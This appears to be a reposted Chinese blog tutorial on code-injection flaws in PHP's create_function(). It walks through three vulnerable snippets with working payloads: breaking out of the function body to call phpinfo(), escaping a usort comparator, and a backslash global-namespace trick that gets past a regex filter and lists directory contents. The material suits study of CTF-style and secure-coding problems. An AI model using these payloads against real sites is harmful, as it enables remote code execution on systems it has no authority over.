php 命名空间 create_function,PHP create_function()注入命令执行漏洞
0x00 create_function()介紹
create_function()創(chuàng)建匿名函數(shù)
string create_function ( string $args , string $code )
string
code 方法代碼部分
舉例:
create_function('$name','echo $name."A"')
類(lèi)似于:
function name($name) {
echo $name."A";
}
0x01 漏洞利用
1
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "
";
echo "==============================";
echo "
";
$f1 = create_function('$a',$str2);
echo "
";
echo "==============================";
?>
payload:
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*
原理:
id=2;}phpinfo();/*
執(zhí)行函數(shù)為:
源代碼:
function fT($a) {
echo "test".$a;
}
注入后代碼:
function fT($a) {
echo "test";}
phpinfo();/*;//此處為注入代碼。
}
2
//how to exp this code
$sort_by=$_GET['sort_by'];
$sorter='strnatcasecmp';
$databases=array('test','test');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>
payload:
func.php?sort_by="]);}phpinfo();/*
3
error_reporting(0);
if(isset($_GET['action'])){
$action=$_GET['action'];
}
if(isset($_GET['action'])){
$arg=$_GET['arg'];
}
if(preg_match('/^[a-z0-9_]*$/isD',$action)){
show_sourse(_FILE_);
}else{
$action($arg,'');
}
?>
正則繞過(guò),數(shù)字字母下劃線(xiàn)都被禁止.
思路就是在開(kāi)頭或結(jié)尾插入字符繞過(guò)檢測(cè),涉及到php全局命名空間:在函數(shù)的頭部加上 \就是調(diào)用全局的此函數(shù),即\create_function()就是調(diào)用全局的create_function()函數(shù),同時(shí)函數(shù)頭部加上\可繞過(guò)正則過(guò)濾,\即%5c.
漏洞利用處
arg,'');,也就是說(shuō)如果利用create_function()函數(shù)漏洞,這里是參數(shù)為GET值,執(zhí)行代碼為空
payload:
ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*
總結(jié)
以上是生活随笔為你收集整理的php 命名空间 create_function,PHP create_function()注入命令执行漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: matlab怎么算2乘2矩阵,【Matl
- 下一篇: php foreach方法,forEac